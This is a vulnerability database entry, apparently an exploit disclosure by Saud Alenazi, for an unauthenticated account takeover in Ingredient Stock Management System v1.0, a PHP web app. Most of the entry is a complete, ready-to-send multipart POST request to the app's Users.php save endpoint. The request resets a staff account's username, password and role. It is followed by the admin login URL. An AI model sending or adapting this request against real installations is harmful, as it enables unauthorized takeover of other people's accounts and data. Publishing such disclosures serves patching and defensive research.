Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)

2022.05.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated) # Date: 28/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Description : ---------------------- Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters # HTTPS Request : POST /isms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555 Content-Length: 1023 Origin: http://localhost Connection: close Referer: http://localhost/isms/admin/?page=user/manage_user Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="id" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="firstname" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="middlename" -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="lastname" hi -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="username" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="password" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="type" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------89160456138077069512415726555-- ==== URL Login : http://localhost/isms/admin/login.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top